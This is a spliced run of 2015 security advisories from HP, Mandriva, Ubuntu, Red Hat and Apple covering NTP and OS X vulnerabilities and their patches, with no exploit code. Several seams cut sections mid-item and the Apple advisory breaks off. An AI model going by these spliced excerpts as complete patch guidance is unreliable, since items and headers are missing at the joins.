(CWE-17)\nSSRT102029\nCERT-VU#852879\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. \n\nHP-UX B.11.31 running NTP v4.x, specifically version C.4.2.6.5.0 or previous\n\nBACKGROUND\n\nCVSS 2.0 Base Metrics\n===========================================================\n Reference Base Vector Base Score\nCVE-2015-1798 (AV:A/AC:H/Au:N/C:N/I:P/A:N) 1.8\nCVE-2015-1799 (AV:A/AC:M/Au:N/C:N/I:P/A:P) 4.3\n===========================================================\n Information on CVSS is documented\n in HP Customer Notice: HPSN-2008-002\n\nRESOLUTION\n\nHP has provided the following solution for HP-UX B.11.31. \n\nA new B.11.31 depot for HP-UX-NTP_C.4.2.6.6.0 is available here:\n\nhttps://h20392.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber\n=HPUX-NTP\n\nReference: http://support.ntp.org/bin/view/Main/SecurityNotice\n\nMANUAL ACTIONS: Yes - Update\n\nPRODUCT SPECIFIC INFORMATION\n\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application\nthat replaces HP-UX Security Patch Check. It analyzes all Security Bulletins\nissued by HP and lists recommended actions that may apply to a specific HP-UX\nsystem. It can also download patches and create a depot automatically. For\nmore information see: https://www.hp.com/go/swa\nThe following text is for use by the HP-UX Software Assistant. \n\nAFFECTED VERSIONS\n\nHP-UX B.11.31\n==================\nNTP.INETSVCS2-BOOT\nNTP.NTP-AUX\nNTP.NTP-RUN\naction: install revision C.4.2.6.6.0 or subsequent\n\nEND AFFECTED VERSIONS\n\nHISTORY\nVersion:1 (rev.1) - 19 May 2015 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running HP software products should be applied in\naccordance with the customer\u0027s patch management policy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HP Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com. \n\nReport: To report a potential security vulnerability with any HP supported\nproduct, send Email to: security-alert@hp.com\n\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\nalerts via Email:\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here:\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HP General Software\nHF = HP Hardware and Firmware\nMP = MPE/iX\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPI = Printing and Imaging\nPV = ProCurve\nST = Storage Software\nTU = Tru64 UNIX\nUX = HP-UX\n\nCopyright 2015 Hewlett-Packard Development Company, L.P. \nHewlett-Packard Company shall not be liable for technical or editorial errors\nor omissions contained herein. The information provided is provided \"as is\"\nwithout warranty of any kind. To the extent permitted by law, neither HP or\nits affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. \nHewlett-Packard Company and the names of Hewlett-Packard products referenced\nherein are trademarks of Hewlett-Packard Company in the United States and\nother countries. Other product and company names mentioned herein may be\ntrademarks of their respective owners. \n _______________________________________________________________________\n\n References:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1798\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1799\n http://support.ntp.org/bin/view/Main/SecurityNotice#Recent_Vulnerabilities\n _______________________________________________________________________\n\n Updated Packages:\n\n Mandriva Business Server 1/X86_64:\n b0f98e6b8700e3e3413582fe28d1ba06 mbs1/x86_64/ntp-4.2.6p5-8.4.mbs1.x86_64.rpm\n d864780718c95368bf9ec81643e35e5d mbs1/x86_64/ntp-client-4.2.6p5-8.4.mbs1.x86_64.rpm\n 6f457df52d46fb8e6b0fe44aead752eb mbs1/x86_64/ntp-doc-4.2.6p5-8.4.mbs1.x86_64.rpm \n b4bff3de733ea6d2839a77a9211ce02b mbs1/SRPMS/ntp-4.2.6p5-8.4.mbs1.src.rpm\n\n Mandriva Business Server 2/X86_64:\n e9ac2f3465bcc50199aef8a4d553927f mbs2/x86_64/ntp-4.2.6p5-16.3.mbs2.x86_64.rpm\n cf2970c3c56efbfa84f964532ad64544 mbs2/x86_64/ntp-client-4.2.6p5-16.3.mbs2.x86_64.rpm\n 1ae1b1d3c2e7bdea25c01c33652b6169 mbs2/x86_64/ntp-doc-4.2.6p5-16.3.mbs2.noarch.rpm \n d250433009fd187361bda6338dc5eede mbs2/SRPMS/ntp-4.2.6p5-16.3.mbs2.src.rpm\n _______________________________________________________________________\n\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\n of md5 checksums and GPG signatures is performed automatically for you. ============================================================================\nUbuntu Security Notice USN-2567-1\nApril 13, 2015\n\nntp vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.10\n- Ubuntu 14.04 LTS\n- Ubuntu 12.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in NTP. (CVE-2015-1798)\n\nMiroslav Lichvar discovered that NTP incorrectly handled certain invalid\npackets. A remote attacker could possibly use this issue to cause a denial\nof service. This issue could either cause ntp-keygen to hang, or\ncould result in non-random keys. (CVE number pending)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.10:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.10.3\n\nUbuntu 14.04 LTS:\n ntp 1:4.2.6.p5+dfsg-3ubuntu2.14.04.3\n\nUbuntu 12.04 LTS:\n ntp 1:4.2.6.p3+dfsg-1ubuntu3.4\n\nIn general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n=====================================================================\n Red Hat Security Advisory\n\nSynopsis: Moderate: ntp security, bug fix, and enhancement update\nAdvisory ID: RHSA-2015:2231-04\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://rhn.redhat.com/errata/RHSA-2015-2231.html\nIssue date: 2015-11-19\nCVE Names: CVE-2014-9297 CVE-2014-9298 CVE-2014-9750 \n CVE-2014-9751 CVE-2015-1798 CVE-2015-1799 \n CVE-2015-3405 \n=====================================================================\n\n1. Summary:\n\nUpdated ntp packages that fix multiple security issues, several bugs, and\nadd various enhancements are now available for Red Hat Enterprise Linux 7. \n\nRed Hat Product Security has rated this update as having Moderate security\nimpact. Common Vulnerability Scoring System (CVSS) base scores, which give\ndetailed severity ratings, are available for each vulnerability from the\nCVE links in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux Client (v. 7) - x86_64\nRed Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux ComputeNode (v. 7) - x86_64\nRed Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64\nRed Hat Enterprise Linux Server (v. 7) - aarch64, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Server Optional (v. 7) - aarch64, noarch, ppc64, ppc64le, s390x, x86_64\nRed Hat Enterprise Linux Workstation (v. 7) - x86_64\nRed Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64\n\n3. Description:\n\nThe Network Time Protocol (NTP) is used to synchronize a computer\u0027s time\nwith another referenced time source. These packages include the ntpd\nservice which continuously adjusts system time and utilities used to query\nand configure the ntpd service. \n\nIt was found that because NTP\u0027s access control was based on a source IP\naddress, an attacker could bypass source IP restrictions and send\nmalicious control and configuration packets by spoofing ::1 addresses. \n(CVE-2014-9298, CVE-2014-9751)\n\nA denial of service flaw was found in the way NTP hosts that were peering\nwith each other authenticated themselves before updating their internal\nstate variables. An attacker could send packets to one peer host, which\ncould cascade to other peers, and stop the synchronization process among\nthe reached peers. (CVE-2015-1799)\n\nA flaw was found in the way the ntp-keygen utility generated MD5 symmetric\nkeys on big-endian systems. An attacker could possibly use this flaw to\nguess generated MD5 keys, which could then be used to spoof an NTP client\nor server. (CVE-2015-3405)\n\nA stack-based buffer overflow was found in the way the NTP autokey protocol\nwas implemented. When an NTP client decrypted a secret received from an NTP\nserver, it could cause that client to crash. (CVE-2014-9297, CVE-2014-9750)\n\nIt was found that ntpd did not check whether a Message Authentication Code\n(MAC) was present in a received packet when ntpd was configured to use\nsymmetric cryptographic keys. A man-in-the-middle attacker could use this\nflaw to send crafted packets that would be accepted by a client or a peer\nwithout the attacker knowing the symmetric key. (CVE-2015-1798)\n\nThe CVE-2015-1798 and CVE-2015-1799 issues were discovered by Miroslav\nLichv\u00e1r of Red Hat. \n\nBug fixes:\n\n* The ntpd service truncated symmetric keys specified in the key file to 20\nbytes. As a consequence, it was impossible to configure NTP authentication\nto work with peers that use longer keys. With this update, the maximum key\nlength has been changed to 32 bytes. (BZ#1191111)\n\n* The ntpd service could previously join multicast groups only when\nstarting, which caused problems if ntpd was started during system boot\nbefore network was configured. With this update, ntpd attempts to join\nmulticast groups every time network configuration is changed. (BZ#1207014)\n\n* Previously, the ntp-keygen utility used the exponent of 3 when generating\nRSA keys. Consequently, generating RSA keys failed when FIPS mode was\nenabled. With this update, ntp-keygen has been modified to use the exponent\nof 65537, and generating keys in FIPS mode now works as expected. \n(BZ#1191116)\n\n* The ntpd service dropped incoming NTP packets if their source port was\nlower than 123 (the NTP port). With this update, ntpd no longer checks the\nsource port number, and clients behind NAT are now able to correctly\nsynchronize with the server. (BZ#1171640)\n\nEnhancements:\n\n* This update adds support for configurable Differentiated Services Code\nPoints (DSCP) in NTP packets, simplifying configuration in large networks\nwhere different NTP implementations or versions are using different DSCP\nvalues. (BZ#1202828)\n\n* This update adds the ability to configure separate clock stepping\nthresholds for each direction (backward and forward). Use the \"stepback\"\nand \"stepfwd\" options to configure each threshold. (BZ#1193154)\n\n* Support for nanosecond resolution has been added to the Structural\nHealth Monitoring (SHM) reference clock. Prior to this update, when a\nPrecision Time Protocol (PTP) hardware clock was used as a time source to\nsynchronize the system clock, the accuracy of the synchronization was\nlimited due to the microsecond resolution of the SHM protocol. The\nnanosecond extension in the SHM protocol now allows sub-microsecond\nsynchronization of the system clock. (BZ#1117702)\n\nAll ntp users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements. \n\n4. Solution:\n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1117702 - SHM refclock doesn\u0027t support nanosecond resolution\n1122012 - SHM refclock allows only two units with owner-only access\n1171640 - NTP drops requests when sourceport is below 123\n1180721 - ntp: mreadvar command crash in ntpq\n1184572 - CVE-2014-9298 CVE-2014-9751 ntp: drop packets with source address ::1\n1184573 - CVE-2014-9297 CVE-2014-9750 ntp: vallen in extension fields are not validated\n1191108 - ntpd should warn when monitoring facility can\u0027t be disabled due to restrict configuration\n1191122 - ntpd -x steps clock on leap second\n1193154 - permit differential fwd/back threshold for step vs. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\naarch64:\nntp-4.2.6p5-22.el7.aarch64.rpm\nntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm\nntpdate-4.2.6p5-22.el7.aarch64.rpm\n\nppc64:\nntp-4.2.6p5-22.el7.ppc64.rpm\nntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm\nntpdate-4.2.6p5-22.el7.ppc64.rpm\n\nppc64le:\nntp-4.2.6p5-22.el7.ppc64le.rpm\nntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm\nntpdate-4.2.6p5-22.el7.ppc64le.rpm\n\ns390x:\nntp-4.2.6p5-22.el7.s390x.rpm\nntp-debuginfo-4.2.6p5-22.el7.s390x.rpm\nntpdate-4.2.6p5-22.el7.s390x.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\naarch64:\nntp-debuginfo-4.2.6p5-22.el7.aarch64.rpm\nsntp-4.2.6p5-22.el7.aarch64.rpm\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nppc64:\nntp-debuginfo-4.2.6p5-22.el7.ppc64.rpm\nsntp-4.2.6p5-22.el7.ppc64.rpm\n\nppc64le:\nntp-debuginfo-4.2.6p5-22.el7.ppc64le.rpm\nsntp-4.2.6p5-22.el7.ppc64le.rpm\n\ns390x:\nntp-debuginfo-4.2.6p5-22.el7.s390x.rpm\nsntp-4.2.6p5-22.el7.s390x.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nntp-4.2.6p5-22.el7.src.rpm\n\nx86_64:\nntp-4.2.6p5-22.el7.x86_64.rpm\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nntpdate-4.2.6p5-22.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nntp-doc-4.2.6p5-22.el7.noarch.rpm\nntp-perl-4.2.6p5-22.el7.noarch.rpm\n\nx86_64:\nntp-debuginfo-4.2.6p5-22.el7.x86_64.rpm\nsntp-4.2.6p5-22.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security. Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2014-9297\nhttps://access.redhat.com/security/cve/CVE-2014-9298\nhttps://access.redhat.com/security/cve/CVE-2014-9750\nhttps://access.redhat.com/security/cve/CVE-2014-9751\nhttps://access.redhat.com/security/cve/CVE-2015-1798\nhttps://access.redhat.com/security/cve/CVE-2015-1799\nhttps://access.redhat.com/security/cve/CVE-2015-3405\nhttps://access.redhat.com/security/updates/classification/#moderate\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2015 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD4DBQFWTkFJXlSAg2UNWIIRAphzAKCRHDVdHI5OvJ8glkXYLBwyQgeyvwCYmTV3\n1hLTu5I/PUzWOnD8rRIlZQ==\n=sWdG\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\nAPPLE-SA-2015-06-30-2 OS X Yosemite v10.10.4 and Security Update\n2015-005\n\nOS X Yosemite v10.10.4 and Security Update 2015-005 are now available\nand address the following:\n\nAdmin Framework\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A process may gain admin privileges without proper\nauthentication\nDescription: An issue existed when checking XPC entitlements. This\nissue was addressed through improved entitlement checking. \nCVE-ID\nCVE-2015-3671 : Emil Kvarnhammar at TrueSec\n\nAdmin Framework\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A non-admin user may obtain admin rights\nDescription: An issue existed in the handling of user\nauthentication. This issue was addressed through improved error\nchecking. \nCVE-ID\nCVE-2015-3672 : Emil Kvarnhammar at TrueSec\n\nAdmin Framework\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker may abuse Directory Utility to gain root\nprivileges\nDescription: Directory Utility was able to be moved and modified to\nachieve code execution within an entitled process. This issue was\naddressed by limiting the disk location that writeconfig clients may\nbe executed from. \nCVE-ID\nCVE-2015-3673 : Patrick Wardle of Synack, Emil Kvarnhammar at TrueSec\n\nafpserver\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may be able to cause unexpected\napplication termination or arbitrary code execution\nDescription: A memory corruption issue existed in the AFP server. \nThis issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3674 : Dean Jerkovich of NCC Group\n\napache\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker may be able to access directories that are\nprotected with HTTP authentication without knowing the correct\ncredentials\nDescription: The default Apache configuration did not include\nmod_hfs_apple. If Apache was manually enabled and the configuration\nwas not changed, some files that should not be accessible might have\nbeen accessible using a specially crafted URL. This issue was\naddressed by enabling mod_hfs_apple. \nCVE-ID\nCVE-2015-3675 : Apple\n\napache\nAvailable for: OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple vulnerabilities exist in PHP, the most serious of\nwhich may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in PHP versions prior\nto 5.5.24 and 5.4.40. These were addressed by updating PHP to\nversions 5.5.24 and 5.4.40. \nCVE-ID\nCVE-2015-0235\nCVE-2015-0273\n\nAppleGraphicsControl\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in AppleGraphicsControl which could\nhave led to the disclosure of kernel memory layout. This issue was\naddressed through improved bounds checking. \nCVE-ID\nCVE-2015-3676 : Chen Liang of KEEN Team\n\nAppleFSCompression\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in LZVN compression that could have\nled to the disclosure of kernel memory content. This issue was\naddressed through improved memory handling. \nCVE-ID\nCVE-2015-3677 : an anonymous researcher working with HP\u0027s Zero Day\nInitiative\n\nAppleThunderboltEDMService\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in the handling of\ncertain Thunderbolt commands from local processes. This issue was\naddressed through improved memory handling. \nCVE-ID\nCVE-2015-3678 : Apple\n\nATS\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in handling\nof certain fonts. These issues were addressed through improved memory\nhandling. \nCVE-ID\nCVE-2015-3679 : Pawel Wylecial working with HP\u0027s Zero Day Initiative\nCVE-2015-3680 : Pawel Wylecial working with HP\u0027s Zero Day Initiative\nCVE-2015-3681 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3682 : Nuode Wei\n\nBluetooth\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: A memory corruption issue existed in the Bluetooth HCI\ninterface. This issue was addressed through improved memory handling. \nCVE-ID\nCVE-2015-3683 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nCertificate Trust Policy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: An attacker with a privileged network position may be able\nto intercept network traffic\nDescription: An intermediate certificate was incorrectly issued by\nthe certificate authority CNNIC. This issue was addressed through the\naddition of a mechanism to trust only a subset of certificates issued\nprior to the mis-issuance of the intermediate. Further details are\navailable at https://support.apple.com/en-us/HT204938\n\nCertificate Trust Policy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nDescription: The certificate trust policy was updated. The complete\nlist of certificates may be viewed at https://support.apple.com/en-\nus/HT202858. \n\nCFNetwork HTTPAuthentication\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Following a maliciously crafted URL may lead to arbitrary\ncode execution\nDescription: A memory corruption issue existed in handling of\ncertain URL credentials. This issue was addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-3684 : Apple\n\nCoreText\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted text file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in the\nprocessing of text files. These issues were addressed through\nimproved bounds checking. \nCVE-ID\nCVE-2015-1157\nCVE-2015-3685 : Apple\nCVE-2015-3686 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3687 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3688 : John Villamil (@day6reak), Yahoo Pentest Team\nCVE-2015-3689 : Apple\n\ncoreTLS\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: An attacker with a privileged network position may intercept\nSSL/TLS connections\nDescription: coreTLS accepted short ephemeral Diffie-Hellman (DH)\nkeys, as used in export-strength ephemeral DH cipher suites. This\nissue, also known as Logjam, allowed an attacker with a privileged\nnetwork position to downgrade security to 512-bit DH if the server\nsupported an export-strength ephemeral DH cipher suite. The issue was\naddressed by increasing the default minimum size allowed for DH\nephemeral keys to 768 bits. \nCVE-ID\nCVE-2015-4000 : The weakdh team at weakdh.org, Hanno Boeck\n\nDiskImages\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An information disclosure issue existed in the\nprocessing of disk images. This issue was addressed through improved\nmemory management. \nCVE-ID\nCVE-2015-3690 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nDisplay Drivers\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: An issue existed in the Monitor Control Command Set\nkernel extension by which a userland process could control the value\nof a function pointer within the kernel. The issue was addressed by\nremoving the affected interface. \nCVE-ID\nCVE-2015-3691 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nEFI\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application with root privileges may be able to\nmodify EFI flash memory\nDescription: An insufficient locking issue existed with EFI flash\nwhen resuming from sleep states. This issue was addressed through\nimproved locking. \nCVE-ID\nCVE-2015-3692 : Trammell Hudson of Two Sigma Investments, Xeno Kovah\nand Corey Kallenberg of LegbaCore LLC, Pedro Vilaca\n\nEFI\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may induce memory corruption to\nescalate privileges\nDescription: A disturbance error, also known as Rowhammer, exists\nwith some DDR3 RAM that could have led to memory corruption. This\nissue was mitigated by increasing memory refresh rates. \nCVE-ID\nCVE-2015-3693 : Mark Seaborn and Thomas Dullien of Google, working\nfrom original research by Yoongu Kim et al (2014)\n\nFontParser\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-3694 : John Villamil (@day6reak), Yahoo Pentest Team\n\nGraphics Driver\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: An out of bounds write issue existed in NVIDIA graphics\ndriver. This issue was addressed through improved bounds checking. \nCVE-ID\nCVE-2015-3712 : Ian Beer of Google Project Zero\n\nIntel Graphics Driver\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple buffer overflow issues exist in the Intel graphics\ndriver, the most serious of which may lead to arbitrary code\nexecution with system privileges\nDescription: Multiple buffer overflow issues existed in the Intel\ngraphics driver. These were addressed through additional bounds\nchecks. \nCVE-ID\nCVE-2015-3695 : Ian Beer of Google Project Zero\nCVE-2015-3696 : Ian Beer of Google Project Zero\nCVE-2015-3697 : Ian Beer of Google Project Zero\nCVE-2015-3698 : Ian Beer of Google Project Zero\nCVE-2015-3699 : Ian Beer of Google Project Zero\nCVE-2015-3700 : Ian Beer of Google Project Zero\nCVE-2015-3701 : Ian Beer of Google Project Zero\nCVE-2015-3702 : KEEN Team\n\nImageIO\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple vulnerabilities existed in libtiff, the most\nserious of which may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in libtiff versions\nprior to 4.0.4. They were addressed by updating libtiff to version\n4.0.4. \nCVE-ID\nCVE-2014-8127\nCVE-2014-8128\nCVE-2014-8129\nCVE-2014-8130\n\nImageIO\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted .tiff file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\n.tiff files. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-3703 : Apple\n\nInstall Framework Legacy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Several issues existed in how Install.framework\u0027s\n\u0027runner\u0027 setuid binary dropped privileges. This was addressed by\nproperly dropping privileges. \nCVE-ID\nCVE-2015-3704 : Ian Beer of Google Project Zero\n\nIOAcceleratorFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Multiple memory corruption issues existed in\nIOAcceleratorFamily. These issues were addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-3705 : KEEN Team\nCVE-2015-3706 : KEEN Team\n\nIOFireWireFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Multiple null pointer dereference issues existed in the\nFireWire driver. These issues were addressed through improved error\nchecking. \nCVE-ID\nCVE-2015-3707 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: A memory management issue existed in the handling of\nAPIs related to kernel extensions which could have led to the\ndisclosure of kernel memory layout. This issue was addressed through\nimproved memory management. \nCVE-ID\nCVE-2015-3720 : Stefan Esser\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: A memory management issue existed in the handling of\nHFS parameters which could have led to the disclosure of kernel\nmemory layout. This issue was addressed through improved memory\nmanagement. \nCVE-ID\nCVE-2015-3721 : Ian Beer of Google Project Zero\n\nkext tools\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to overwrite arbitrary\nfiles\nDescription: kextd followed symbolic links while creating a new\nfile. This issue was addressed through improved handling of symbolic\nlinks. \nCVE-ID\nCVE-2015-3708 : Ian Beer of Google Project Zero\n\nkext tools\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A local user may be able to load unsigned kernel extensions\nDescription: A time-of-check time-of-use (TOCTOU) race condition\ncondition existed while validating the paths of kernel extensions. \nThis issue was addressed through improved checks to validate the path\nof the kernel extensions. \nCVE-ID\nCVE-2015-3709 : Ian Beer of Google Project Zero\n\nMail\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A maliciously crafted email can replace the message content\nwith an arbitrary webpage when the message is viewed\nDescription: An issue existed in the support for HTML email which\nallowed message content to be refreshed with an arbitrary webpage. \nThe issue was addressed through restricted support for HTML content. \nCVE-ID\nCVE-2015-3710 : Aaron Sigel of vtty.com, Jan Soucek\n\nntfs\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in NTFS that could have led to the\ndisclosure of kernel memory content. This issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2015-3711 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nntp\nAvailable for: 